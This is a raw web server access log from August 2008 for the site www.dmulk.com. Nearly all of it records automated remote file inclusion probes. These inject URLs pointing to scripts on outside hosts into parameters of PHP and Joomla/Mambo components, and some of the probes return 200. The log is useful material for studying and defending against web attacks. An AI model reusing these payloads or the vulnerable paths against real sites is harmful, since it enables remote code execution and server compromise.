64.185.237.191 - - [18/Aug/2008:12:45:37 -0700] "GET /logs/access_080808.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:12:45:37 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [18/Aug/2008:12:45:37 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
124.93.200.34 - - [18/Aug/2008:12:46:00 -0700] "GET /logs/access_080122.log/@rfihttp://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:12:46:49 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:12:46:49 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:12:46:50 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.169.143.65 - - [18/Aug/2008:12:47:19 -0700] "GET /logs/access_080630.log//include/admin.lib.inc.php?site_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.80.18.136 - - [18/Aug/2008:12:47:26 -0700] "GET /index.php?fn=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 200 10980 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.70.15 - - [18/Aug/2008:12:47:37 -0700] "GET /logs/access_080621.log//?custompluginfile[]=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.101.197.154 - - [18/Aug/2008:12:48:02 -0700] "GET /logs/access.log///e404.php?DOCUMENT_ROOT=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.17.129.24 - - [18/Aug/2008:12:48:20 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [18/Aug/2008:12:48:25 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.136 - - [18/Aug/2008:12:48:47 -0700] "GET /logs/access_080213.log/?sourcedir=http://www.sibtorg.com/shop/usr/extensions/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:12:49:59 -0700] "GET /logs/access_080624.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.10.154.65 - - [18/Aug/2008:12:50:41 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.10.154.65 - - [18/Aug/2008:12:50:42 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.10.154.65 - - [18/Aug/2008:12:50:42 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.10.154.65 - - [18/Aug/2008:12:50:43 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.100.30.4 - - [18/Aug/2008:12:51:23 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.30.4 - - [18/Aug/2008:12:51:24 -0700] "GET /phphtml.php?htmlclass_path=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.30.4 - - [18/Aug/2008:12:51:25 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.47.236.56 - - [18/Aug/2008:12:52:18 -0700] "GET /logs/access_080717.log//?path%5Bdocroot%5D=http://www.rocks-guild.com/raid//templates_c/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
89.47.236.56 - - [18/Aug/2008:12:52:18 -0700] "GET /logs/access_080227.log//?path%5Bdocroot%5D=http://www.rocks-guild.com/raid//templates_c/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
89.47.236.56 - - [18/Aug/2008:12:52:19 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.rocks-guild.com/raid//templates_c/poiid.txt???? HTTP/1.1" 200 61146 "-" "libwww-perl/5.814" "www.dmulk.com"
89.47.236.56 - - [18/Aug/2008:12:52:19 -0700] "GET //?path%5Bdocroot%5D=http://www.rocks-guild.com/raid//templates_c/poiid.txt???? HTTP/1.1" 200 11024 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.8.237 - - [18/Aug/2008:12:52:31 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [18/Aug/2008:12:52:31 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [18/Aug/2008:12:52:31 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.221.130.5 - - [18/Aug/2008:12:52:46 -0700] "GET /logs/errors.php?error=http://biz4youhost.com//2.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.5 - - [18/Aug/2008:12:52:47 -0700] "GET /errors.php?error=http://biz4youhost.com//2.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:12:52:58 -0700] "GET /logs/access_080808.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:12:52:58 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:12:52:59 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:53:15 -0700] "GET /logs/access_080324.log//components/com_flyspray/startdown.php?file=http://www.myboso.com/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:53:16 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.myboso.com/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:53:16 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.myboso.com/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
72.52.212.40 - - [18/Aug/2008:12:53:22 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.52.212.40 - - [18/Aug/2008:12:53:22 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.52.212.40 - - [18/Aug/2008:12:53:23 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:54:00 -0700] "GET /logs/access_080730.log//components/com_flyspray/startdown.php?file=http://www.myboso.com/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
200.101.192.223 - - [18/Aug/2008:12:54:16 -0700] "GET /logs/access_080603.log//faqsupport/samplefaqsupport.php?path[docroot]=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.246.8.237 - - [18/Aug/2008:12:54:19 -0700] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.246.5.10 - - [18/Aug/2008:12:54:27 -0700] "GET /errors.php?error=http://www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.88.11 - - [18/Aug/2008:12:54:53 -0700] "GET /logs/access_080309.log//?path%5Bdocroot%5D=http://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
85.214.88.11 - - [18/Aug/2008:12:54:53 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 200 61146 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
85.214.88.11 - - [18/Aug/2008:12:54:54 -0700] "GET /logs/access_080219.log//?path%5Bdocroot%5D=http://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
85.214.88.11 - - [18/Aug/2008:12:54:54 -0700] "GET //?path%5Bdocroot%5D=http://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 200 10994 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
67.192.48.154 - - [18/Aug/2008:12:54:55 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
67.192.48.154 - - [18/Aug/2008:12:54:55 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
68.178.198.129 - - [18/Aug/2008:12:55:01 -0700] "GET /logs/access_080608.log//?_SERVER[DOCUMENT_ROOT]=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.125 - - [18/Aug/2008:12:55:05 -0700] "GET /logs/access_080308.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.101.192.223 - - [18/Aug/2008:12:55:09 -0700] "GET /logs/access_080713.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.101.192.223 - - [18/Aug/2008:12:55:11 -0700] "GET /logs/access_080606.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.214.88.11 - - [18/Aug/2008:12:55:16 -0700] "GET /logs/access_080227.log//?path%5Bdocroot%5D=http://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:12:55:19 -0700] "GET /logs/access_080329.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.214.88.11 - - [18/Aug/2008:12:55:21 -0700] "GET /logs/access_080717.log//?path%5Bdocroot%5D=http://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:55:28 -0700] "GET /logs/?sourcedir=http://www.myboso.com/echo.txt?? HTTP/1.0" 200 61125 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:55:29 -0700] "GET /?sourcedir=http://www.myboso.com/echo.txt?? HTTP/1.0" 200 10919 "-" "libwww-perl/5.53" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:12:55:30 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:12:55:30 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.76.16 - - [18/Aug/2008:12:55:53 -0700] "GET /logs/access_080327.log//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.76.16 - - [18/Aug/2008:12:55:53 -0700] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.76.16 - - [18/Aug/2008:12:55:53 -0700] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:12:56:01 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
78.80.18.136 - - [18/Aug/2008:12:56:16 -0700] "GET /claroline/phpbb/page_tail.php?includePath=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.115.34.17 - - [18/Aug/2008:12:56:37 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [18/Aug/2008:12:56:39 -0700] "GET /?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 200 10951 "-" "libwww-perl/5.813" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:12:56:40 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.246.46.202 - - [18/Aug/2008:12:56:40 -0700] "GET /logs/access_080309.log//?path%5Bdocroot%5D=http://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
208.115.34.17 - - [18/Aug/2008:12:56:40 -0700] "GET /?sourcedir=http://www.myboso.com/load.txt? HTTP/1.1" 200 10929 "-" "libwww-perl/5.813" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:12:56:40 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.246.46.202 - - [18/Aug/2008:12:56:40 -0700] "GET /logs/access_080219.log//?path%5Bdocroot%5D=http://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
208.115.34.17 - - [18/Aug/2008:12:56:40 -0700] "GET /logs/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 200 61141 "-" "libwww-perl/5.813" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:12:56:41 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.246.46.202 - - [18/Aug/2008:12:56:43 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 200 61146 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
213.246.46.202 - - [18/Aug/2008:12:56:43 -0700] "GET //?path%5Bdocroot%5D=http://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 200 10994 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:56:51 -0700] "GET /logs/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 61125 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:56:53 -0700] "GET /?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 10935 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:56:53 -0700] "GET /?sourcedir=http://www.myboso.com/load.txt? HTTP/1.0" 200 10913 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:56:59 -0700] "GET /logs/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 61125 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:57:00 -0700] "GET /?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 10935 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:57:01 -0700] "GET /?sourcedir=http://www.myboso.com/load.txt? HTTP/1.0" 200 10913 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:57:07 -0700] "GET /logs/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 61125 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:57:08 -0700] "GET /?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 10935 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:57:09 -0700] "GET /?sourcedir=http://www.myboso.com/load.txt? HTTP/1.0" 200 10913 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:57:10 -0700] "GET /logs/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 61125 "-" "libwww-perl/5.53" "www.dmulk.com"
86.58.154.237 - - [18/Aug/2008:12:57:10 -0700] "GET /logs/access_080615.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:57:11 -0700] "GET /?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 10935 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:57:12 -0700] "GET /?sourcedir=http://www.myboso.com/load.txt? HTTP/1.0" 200 10913 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:57:19 -0700] "GET /logs/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 61125 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:57:20 -0700] "GET /?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 10935 "-" "libwww-perl/5.53" "www.dmulk.com"
65.55.211.21 - - [18/Aug/2008:12:57:20 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.21 - - [18/Aug/2008:12:57:21 -0700] "GET /tmp/php8E974i HTTP/1.1" 403 163 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
200.101.192.223 - - [18/Aug/2008:12:57:21 -0700] "GET /logs/access_080605.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:57:21 -0700] "GET /?sourcedir=http://www.myboso.com/load.txt? HTTP/1.0" 200 10913 "-" "libwww-perl/5.53" "www.dmulk.com"
200.101.192.223 - - [18/Aug/2008:12:57:23 -0700] "GET /logs/access_080530.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.72.218.250 - - [18/Aug/2008:12:57:24 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
65.55.213.30 - - [18/Aug/2008:12:57:24 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [18/Aug/2008:12:57:26 -0700] "GET /logs/access_080219.log HTTP/1.0" 200 1432781 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
201.17.129.24 - - [18/Aug/2008:12:57:28 -0700] "GET /logs//errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [18/Aug/2008:12:57:32 -0700] "GET //errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.58.154.237 - - [18/Aug/2008:12:57:49 -0700] "GET /logs/access_080522.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.115.34.17 - - [18/Aug/2008:12:57:58 -0700] "GET /logs/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 200 61141 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [18/Aug/2008:12:57:59 -0700] "GET /?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 200 10935 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [18/Aug/2008:12:58:01 -0700] "GET /?sourcedir=http://www.myboso.com/load.txt? HTTP/1.1" 200 10929 "-" "libwww-perl/5.813" "www.dmulk.com"
216.246.76.16 - - [18/Aug/2008:12:58:12 -0700] "GET /logs/access_080312.log//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:12:58:31 -0700] "GET /logs/access_080213.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:12:58:32 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:12:58:32 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.105.33.158 - - [18/Aug/2008:12:58:33 -0700] "GET /logs/access_080211.log/index.php?id=&lang=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.115.34.17 - - [18/Aug/2008:12:58:41 -0700] "GET /logs/access_080213.log/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.72.218.250 - - [18/Aug/2008:12:58:41 -0700] "GET /logs/access_080808.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
69.72.218.250 - - [18/Aug/2008:12:58:41 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:59:13 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:59:14 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:59:14 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:59:14 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:59:14 -0700] "GET /?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 10935 "-" "libwww-perl/5.53" "www.dmulk.com"
212.53.64.40 - - [18/Aug/2008:12:59:15 -0700] "GET /?sourcedir=http://www.ghareng.com/alat/echo.txt?? HTTP/1.0" 200 10935 "-" "libwww-perl/5.53" "www.dmulk.com"
